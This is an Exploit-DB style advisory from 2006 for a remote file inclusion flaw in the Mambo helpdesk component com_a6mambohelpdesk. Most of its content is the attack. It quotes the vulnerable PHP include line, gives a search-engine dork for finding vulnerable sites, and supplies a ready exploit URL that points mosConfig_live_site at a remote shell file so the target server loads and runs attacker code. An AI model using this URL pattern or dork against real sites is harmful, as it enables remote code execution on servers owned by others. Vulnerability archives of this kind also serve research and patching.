Mambo Component 'com_a6mambohelpdesk' 18RC1 - Remote File Inclusion

EDB-ID:

2078

Author:

Dr.Jr7

Type:

webapps

Platform:

PHP

Published:

2006-07-27

a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability

# Rish : High
# Class : Remote
# Script : a6mambohelpdesk
# Thanx : www.lezr.com/vb

# codes

<?
include("$mosConfig_live_site/components/com_a6mambohelpdesk/about.html" );
?>

# d0rkiz : allinurl:"com_a6mambohelpdesk"

http://www.site.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://shell.txt


# by Dr.Jr7

# milw0rm.com [2006-07-27]